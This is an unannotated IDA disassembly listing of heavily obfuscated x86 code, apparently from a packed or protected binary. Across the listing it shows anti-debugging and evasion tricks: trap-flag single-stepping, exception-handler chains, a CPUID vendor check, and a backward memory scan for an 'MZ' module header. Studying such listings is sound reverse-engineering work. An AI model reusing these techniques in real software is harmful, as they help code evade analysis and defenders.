loc_4263C4: ; CODE XREF: sub_428D63:loc_42DEFA�j
xor edx, 2E60A5F8h
and ecx, edx
pop edx
mov al, 1
jmp loc_42673D
; END OF FUNCTION CHUNK FOR sub_428D63
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429F53
loc_4263D5: ; CODE XREF: sub_429F53+3�j
jmp sub_429EA9
; END OF FUNCTION CHUNK FOR sub_429F53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B02
loc_4263DA: ; CODE XREF: sub_427B02-23BA�j
jmp loc_42866D
; END OF FUNCTION CHUNK FOR sub_427B02
; ---------------------------------------------------------------------------
loc_4263DF: ; CODE XREF: _0182ofla:0042E331�j
or edx, ebx
jmp loc_429226
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42931E
loc_4263E6: ; CODE XREF: sub_42931E-2491�j
push offset loc_428802
jmp nullsub_66
; END OF FUNCTION CHUNK FOR sub_42931E
; =============== S U B R O U T I N E =======================================
sub_4263F0 proc near ; DATA XREF: sub_42ECAD:loc_42991C�o
mov edx, [ebp+8]
mov [edx-10h], eax
inc dword ptr [ebp-4]
push offset loc_42854C
jmp nullsub_193
sub_4263F0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D70E
loc_426403: ; CODE XREF: sub_42D70E:loc_42DD48�j
push eax
push 0C53549BBh
pop eax
sub eax, 4DF70E2h
jmp loc_42E4A8
; END OF FUNCTION CHUNK FOR sub_42D70E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_426415: ; CODE XREF: sub_428F20:loc_429CDF�j
mov eax, 1
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
xor [esi], edx
push 5A46B847h
jmp loc_42B8DA
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA65
loc_426431: ; CODE XREF: sub_42DA65-3617�j
pushf
jmp loc_4267D2
; END OF FUNCTION CHUNK FOR sub_42DA65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D935
loc_426437: ; CODE XREF: sub_42D935+B�j
add esi, 8DE4C9F6h
xchg esi, [esp+0]
jmp loc_426A09
; END OF FUNCTION CHUNK FOR sub_42D935
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_426446: ; CODE XREF: _0182ofla:0042C7F8�j
jmp loc_423665
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42644B: ; CODE XREF: sub_425B00+3591�j
jmp loc_42A779
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_426450: ; CODE XREF: sub_42380D+1A0�j
jmp nullsub_48
; END OF FUNCTION CHUNK FOR sub_42380D
; =============== S U B R O U T I N E =======================================
sub_426455 proc near ; CODE XREF: sub_423A2A+10E7�p
; sub_42ECFA:loc_42E2FF�p
; FUNCTION CHUNK AT 00425B91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427491 SIZE 0000000A BYTES
mov eax, cs
xor al, al
call sub_4296F0
loc_42645E: ; CODE XREF: sub_423D9E+6�j
push 6C9DB377h
pop eax
xor eax, 0EE86F033h
rol eax, 9
jmp loc_425B91
sub_426455 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_426472: ; CODE XREF: sub_4253F4+7BB4�j
jo loc_42543A
push 0B34766C8h
jge loc_42D2A4
jmp loc_428BC9
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_426488: ; CODE XREF: sub_4282B8:loc_42C4D8�j
add edi, 2EBCE822h
test eax, edi
pop edi
jz loc_42848C
jmp loc_425081
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
loc_42649C: ; CODE XREF: _0182ofla:0042DA87�j
add edx, 495C5024h
xchg edx, [esp]
push ebx
pushf
push 0A4B08C78h
pop ebx
jmp loc_424AC8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_4264B3: ; CODE XREF: sub_428AC9+56AA�j
jmp loc_427528
; END OF FUNCTION CHUNK FOR sub_428AC9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_4264B8: ; CODE XREF: sub_42E18E:loc_426B49�j
; sub_4298DD-2D82�j
add eax, 4A429244h
xchg eax, [esp+4+var_4]
jmp sub_42C5EF
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
loc_4264C6: ; DATA XREF: sub_425D9A+1�o
mov ebp, esp
push 2C43BA49h
mov [esp], ecx
mov esp, ebp
pop ebp
push offset sub_428D2D
jmp loc_42579D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_4264DD: ; CODE XREF: sub_42B3C2:loc_426945�j
; sub_425B6E+8A32�j
jge loc_426F33
loc_4264E3: ; CODE XREF: sub_4253F4-157�j
jmp loc_4255D4
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
xor ebx, 0AE8D442Bh
push 9C47020Bh
adc edx, 0A6F649EEh
sbb edi, 665C7BB4h
jmp loc_426F33
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_426504: ; CODE XREF: sub_42AB3E-725F�j
; _0182ofla:004249D0�j
push offset loc_42B518
jmp nullsub_155
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
loc_42650E: ; CODE XREF: _0182ofla:004265DB�j
jnz loc_42E870
jmp loc_42B20E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_426519: ; CODE XREF: sub_423FCD+A653�j
push 29B02C0Bh
and ebx, 0B866BD7Bh
jmp loc_42404D
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_426529: ; CODE XREF: sub_428D63-2A4F�j
shl eax, 1Eh
xor ebx, edx
push edx
test edx, ebx
jmp loc_42420D
; END OF FUNCTION CHUNK FOR sub_428D63
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_242. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D15D
loc_426537: ; CODE XREF: sub_42D15D:loc_42DA97�j
pop ecx
sub ecx, 0F356DFE2h
; END OF FUNCTION CHUNK FOR sub_42D15D
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42653E: ; CODE XREF: sub_428F20-4A42�j
add ecx, 0D32A7E37h
push offset loc_4235B4
jmp loc_426189
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_42654E: ; CODE XREF: sub_423F50:loc_429F4E�j
mov [ebp-4], eax
; END OF FUNCTION CHUNK FOR sub_423F50
; START OF FUNCTION CHUNK FOR sub_428D63
loc_426551: ; CODE XREF: sub_423F50:loc_424447�j
; sub_428D63:loc_42A53E�j ...
mov eax, [ebp-1Ch]
call sub_4289E4
mov [ebp-8], eax
jmp loc_426ADD
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_426561 proc near ; CODE XREF: sub_423F50:loc_424454�p
; sub_429AC6+620�p ...
; FUNCTION CHUNK AT 0042B078 SIZE 00000005 BYTES
js sub_42AAE0
push offset sub_42D950
jmp loc_42B078
sub_426561 endp
; =============== S U B R O U T I N E =======================================
sub_426571 proc near ; CODE XREF: sub_42448C-2EC�p
; _0182ofla:0042868D�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 004239BD SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00423C0A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004245F9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004255F9 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042624D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426E39 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042708B SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00427164 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042791B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042875E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004287D2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042A8EF SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042CB85 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042D158 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DBB1 SIZE 00000004 BYTES
xchg eax, [esp+0]
pop eax
movzx eax, byte ptr [eax]
shr eax, 1
cmp eax, 66h
jnz loc_42A902
jmp loc_42A8EF
sub_426571 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_426588: ; CODE XREF: sub_4231F3:loc_428985�j
or ecx, ecx
jz loc_428E98
call sub_423AB1
loc_426595: ; CODE XREF: _0182ofla:00424FE1�j
jmp loc_424940
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6D5
loc_42659A: ; CODE XREF: sub_42A6D5:loc_4243FD�j
xchg edi, [esi]
add edi, 0AC295C97h
jmp loc_42EA69
; END OF FUNCTION CHUNK FOR sub_42A6D5
; ---------------------------------------------------------------------------
mov edx, 20413B0Fh
push offset sub_42CCD0
jmp locret_425B86
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_206. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4265B7: ; CODE XREF: _0182ofla:loc_42AB70�j
pop ebp
retn 8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_4265BB: ; CODE XREF: sub_426319+1DC3�j
jmp loc_42366F
; END OF FUNCTION CHUNK FOR sub_426319
; =============== S U B R O U T I N E =======================================
sub_4265C0 proc near ; CODE XREF: sub_423461+14�p
; sub_429038:loc_4236DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00423786 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042442E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00428F41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B223 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BCF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C436 SIZE 0000000C BYTES
jnb sub_42C1B2
push ebp
jmp loc_42BCF8
sub_4265C0 endp
; ---------------------------------------------------------------------------
sub eax, ds:dword_424C1C
shr eax, 11h
jz loc_425F7E
jmp loc_42650E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423114
loc_4265E0: ; CODE XREF: sub_423114+C30�j
ror eax, 9
jbe nullsub_117
mov ebx, esi
ja loc_42A376
sbb ebx, ebp
jmp loc_42DDB2
; END OF FUNCTION CHUNK FOR sub_423114
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423AF2
loc_4265F8: ; CODE XREF: sub_423AF2+7CAC�j
jp loc_42DF25
rol ebp, 8
ja loc_429831
jmp loc_42AE9D
; END OF FUNCTION CHUNK FOR sub_423AF2
; =============== S U B R O U T I N E =======================================
sub_42660C proc near ; CODE XREF: sub_428D09:loc_428C58�j
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
; FUNCTION CHUNK AT 00423008 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004231BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004239E7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042436E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042543A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00425F33 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004260CB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00426274 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426EDA SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004271EF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427378 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004278AA SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004278E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427E0E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042812D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428B79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429722 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042B490 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B767 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042CF93 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042E928 SIZE 00000005 BYTES
add esp, 0FFFFFFECh
cmp ds:dword_4257A4, 0
jnz loc_424009
jmp loc_429722
sub_42660C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DFA
loc_426621: ; CODE XREF: sub_427DFA-423E�j
jnz loc_42E005
jmp loc_424C7A
; END OF FUNCTION CHUNK FOR sub_427DFA
; =============== S U B R O U T I N E =======================================
sub_42662C proc near ; DATA XREF: sub_42C2CC+12AB�o
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 00423F31 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004241F8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004248E3 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00426229 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426667 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426CEA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004275F6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004285EE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042CD04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D73E SIZE 00000022 BYTES
add esp, 0FFFFFFF0h
call sub_428D17
mov edx, 0CB39536Bh
call sub_42D71D
push esi
push 53E98C87h
jmp loc_426229
sub_42662C endp
; =============== S U B R O U T I N E =======================================
sub_426649 proc near ; DATA XREF: sub_42448C-2D9�o
; FUNCTION CHUNK AT 00429FDA SIZE 0000001F BYTES
add eax, 8120DC91h
add eax, ebp
push edx
push 75A6647Ch
jmp loc_429FDA
sub_426649 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42665D: ; CODE XREF: sub_42798F+5262�j
jmp loc_4240EF
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427797
loc_426662: ; CODE XREF: sub_427797+11�j
jmp loc_427281
; END OF FUNCTION CHUNK FOR sub_427797
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_426667: ; CODE XREF: sub_42662C:loc_4241FD�j
cmp ebx, 0B148547h
jmp loc_426CEA
; END OF FUNCTION CHUNK FOR sub_42662C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_426673: ; CODE XREF: _0182ofla:00428970�j
jmp loc_42B3E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_426678: ; CODE XREF: sub_42D056:loc_427D21�j
jge loc_42E038
add eax, 0F347583Fh
mov edx, [ecx]
jmp loc_42DE1B
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_42668B: ; CODE XREF: sub_42349B:loc_42D0D0�j
adc esi, edi
adc esi, 887A65C1h
jmp loc_4296A6
; END OF FUNCTION CHUNK FOR sub_42349B
; ---------------------------------------------------------------------------
or edx, ebx
cmp eax, edx
jmp loc_42CDE5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429242
loc_4266A1: ; CODE XREF: sub_429242-4FFE�j
; DATA XREF: _0182ofla:loc_423665�o
pop dword ptr fs:0
xchg eax, [esp+0]
pop eax
push ebx
push 0FE6E7131h
jmp loc_42B85A
; END OF FUNCTION CHUNK FOR sub_429242
; ---------------------------------------------------------------------------
add esi, 4FCF6E2Fh
jmp sub_42E2B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42945B
loc_4266C1: ; CODE XREF: sub_42945B+10�j
add [ebp-8], eax
mov eax, [ebp-8]
push offset loc_42ECA4
jmp loc_4275C2
; END OF FUNCTION CHUNK FOR sub_42945B
; =============== S U B R O U T I N E =======================================
sub_4266D1 proc near ; CODE XREF: _0182ofla:004246CF�j
; _0182ofla:00427C8D�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042EA10 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
xchg edx, [esp-4+arg_0]
jmp loc_42EA10
sub_4266D1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D52E
loc_4266DD: ; CODE XREF: sub_42D52E+1A�j
call sub_42CED4
jmp loc_42DC28
; END OF FUNCTION CHUNK FOR sub_42D52E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CE73
loc_4266E7: ; CODE XREF: sub_42CE73+E�j
pop edx
call sub_425A5C
loc_4266ED: ; CODE XREF: _0182ofla:00425111�j
jmp loc_426E7C
; END OF FUNCTION CHUNK FOR sub_42CE73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_4266F2: ; CODE XREF: sub_425BF8-279C�j
jmp sub_42AA7A
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D5EF
loc_4266F7: ; CODE XREF: sub_42D5EF+4�j
xchg ebp, ecx
push ecx
xchg ebp, ecx
mov ebp, esp
call nullsub_9
mov eax, ds:dword_42B8EC
call sub_42905D
; END OF FUNCTION CHUNK FOR sub_42D5EF
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42670D: ; CODE XREF: sub_423A2A+1F09�j
jmp loc_4243E6
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
locret_426712: ; CODE XREF: _0182ofla:loc_4272B3�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_426713: ; CODE XREF: sub_428EB9+C52�j
jmp loc_4269CF
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
loc_426718: ; CODE XREF: _0182ofla:00424C3C�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
add ecx, 18h
mov al, [ecx]
add ecx, 9Ch
add [ecx], al
jmp loc_429B24
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42673D: ; CODE XREF: sub_428D63-2994�j
call sub_427E32
loc_426742: ; CODE XREF: _0182ofla:004262B3�j
jmp sub_42D71D
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466B
loc_426747: ; CODE XREF: sub_42466B+1�j
jmp loc_42785F
; END OF FUNCTION CHUNK FOR sub_42466B
; ---------------------------------------------------------------------------
locret_42674C: ; CODE XREF: _0182ofla:loc_429032�j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_138. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AB1
loc_42674E: ; CODE XREF: sub_429AB1+5�j
jmp loc_42831F
; END OF FUNCTION CHUNK FOR sub_429AB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A7F
loc_426753: ; CODE XREF: sub_426A7F-3480�j
jmp sub_42892E
; END OF FUNCTION CHUNK FOR sub_426A7F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_426758: ; CODE XREF: _0182ofla:004249B4�j
; sub_423A2A+1F03�j
call sub_423FCD
test al, al
jz loc_42B429
jmp loc_42574D
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42676A: ; CODE XREF: sub_4298DD:loc_424C30�j
; sub_4298DD+18C6�j
cmp dword ptr [ebp-1C8h], 2B584245h
jnz loc_426802
jmp loc_426CA2
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
loc_42677F: ; CODE XREF: _0182ofla:004296DB�j
add edx, ebp
add edx, 0CF283B70h
mov edx, [edx]
mov eax, [edx]
push esi
push 0B41573E7h
pop esi
jmp loc_42DA60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_174. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_426798: ; CODE XREF: sub_427942+1B83�j
jmp nullsub_74
; END OF FUNCTION CHUNK FOR sub_427942
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424072
loc_42679E: ; CODE XREF: sub_424072+9�j
; sub_424072+2740�j ...
jz loc_426BBB
sub ebx, 10000h
mov eax, [ebx]
neg eax
cmp ax, 0A5B3h
jnz loc_42679E
jmp nullsub_198
; END OF FUNCTION CHUNK FOR sub_424072
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A70
loc_4267BD: ; CODE XREF: sub_424A70:loc_4257C4�j
rol eax, 1
add eax, 0F6E3C8C9h
add eax, ebp
add eax, 94D419C3h
jmp loc_42E8FB
; END OF FUNCTION CHUNK FOR sub_424A70
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA65
loc_4267D2: ; CODE XREF: sub_42DA65-7633�j
xchg eax, [esp+8+var_8]
or eax, 100h
xchg eax, [esp+8+var_8]
popf
nop
jmp loc_426D5B
; END OF FUNCTION CHUNK FOR sub_42DA65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C33B
loc_4267E5: ; CODE XREF: sub_42C33B:loc_42C341�j
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42C33B
; =============== S U B R O U T I N E =======================================
sub_4267E7 proc near ; CODE XREF: _0182ofla:0042DB74�p
push dword ptr fs:0
mov fs:0, esp
jmp loc_424F2F
sub_4267E7 endp
; =============== S U B R O U T I N E =======================================
sub_4267F8 proc near ; CODE XREF: _0182ofla:00429BDD�p
; FUNCTION CHUNK AT 00423683 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004238B6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423CF5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00424DDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424DEF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00426F58 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004273CF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004293FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C3FD SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042D114 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DCC6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042E084 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042EA0A SIZE 00000005 BYTES
xchg eax, [esp+0]
add eax, esi
jmp loc_423683
sub_4267F8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_426802: ; CODE XREF: sub_4298DD-3169�j
; sub_4298DD+A�j
push offset loc_424F4D
jmp nullsub_58
; END OF FUNCTION CHUNK FOR sub_4298DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF0
loc_42680D: ; CODE XREF: sub_42DBF0+17�j
jmp loc_427EBE
; END OF FUNCTION CHUNK FOR sub_42DBF0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB27
loc_426812: ; CODE XREF: sub_42AB27-172F�j
jmp loc_42A681
; END OF FUNCTION CHUNK FOR sub_42AB27
; ---------------------------------------------------------------------------
loc_426817: ; CODE XREF: _0182ofla:00428A4F�j
jmp loc_42DAA4
; ---------------------------------------------------------------------------
loc_42681C: ; CODE XREF: _0182ofla:00426012�j
jmp loc_424A23
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_426821: ; CODE XREF: sub_425B00:loc_428ABF�j
jz loc_42C8E0
push ebp
mov eax, [ebp-20h]
call sub_42A51F
pop ecx
jmp loc_428DDF
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_426836: ; CODE XREF: sub_42798F+1FC2�j
jbe loc_4243A7
loc_42683C: ; CODE XREF: sub_42798F:loc_4298F2�j
push edx
push 14EC3529h
mov edx, offset sub_4291F5
push offset sub_4291F1
jmp loc_42756D
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_426851 proc near ; DATA XREF: sub_424498+2C7A�o
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 00423E15 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042787B SIZE 0000002F BYTES
; FUNCTION CHUNK AT 00429821 SIZE 00000005 BYTES
xor ecx, 529E63ACh
xchg ecx, [esp+0]
push 0
push 0
push 0
jmp loc_423E15
sub_426851 endp
; ---------------------------------------------------------------------------
mov ebx, ecx
cmp ecx, 35E3D77Dh
jmp loc_4238F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427259
loc_426872: ; CODE XREF: sub_427259-3297�j
adc esi, 30A0ACAh
jmp loc_428A9B
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
jno loc_425A37
jmp sub_427762
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_426888: ; CODE XREF: sub_4253F4+3365�j
xor [esi], ebx
add [esi], edx
xor [esi], ecx
cmp ebx, 756E6547h
jz loc_4284AE
jmp loc_42CF2F
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
lea eax, sub_42AE82
mov [ebp-4], eax
push edi
call sub_426B01
; START OF FUNCTION CHUNK FOR sub_42DA2D
loc_4268AE: ; CODE XREF: sub_42DA2D-4680�j
jmp loc_42625A
; END OF FUNCTION CHUNK FOR sub_42DA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_4268B3: ; CODE XREF: sub_4298DD:loc_423167�j
jz loc_423E82
loc_4268B9: ; CODE XREF: sub_426020+4EEC�j
jmp loc_4251D8
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
loc_4268BE: ; CODE XREF: _0182ofla:loc_42D637�j
mov edi, [eax]
jmp loc_423E76
; ---------------------------------------------------------------------------
loc_4268C5: ; CODE XREF: _0182ofla:0042C2EB�j
jb loc_423C29
sbb ecx, esi
cdq
jmp loc_423436
; ---------------------------------------------------------------------------
loc_4268D3: ; CODE XREF: _0182ofla:0042C16D�j
jz loc_4277E6
mov esi, ecx
mov ebp, [ebx]
jmp loc_4277E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC59
loc_4268E2: ; CODE XREF: sub_42CC59:loc_42D29F�j
push edx
push 0FED8DD2Eh
pop edx
xor edx, 0AB30D610h
add edx, ebp
add edx, 0AA17F4B6h
jmp loc_42E8F4
; END OF FUNCTION CHUNK FOR sub_42CC59
; =============== S U B R O U T I N E =======================================
sub_4268FC proc near ; CODE XREF: sub_4231F3+1878�p
; _0182ofla:0042DFE2�j
; FUNCTION CHUNK AT 0042D50B SIZE 00000005 BYTES
mov [esp+0], esi
pop esi
call sub_424065
jnz loc_42E87F
mov ecx, [ebx+edx-4]
or ecx, ecx
loc_426911: ; CODE XREF: sub_4231F3+11�j
jz loc_42D510
mov ebx, [ebx+ecx]
jmp loc_42D50B
sub_4268FC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42691F: ; CODE XREF: sub_424184+8DCB�j
jz loc_42E3DB
jmp loc_424CF7
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_42692A: ; CODE XREF: sub_4231F3+8E1�j
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_428E98
call sub_424065
jmp loc_424058
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
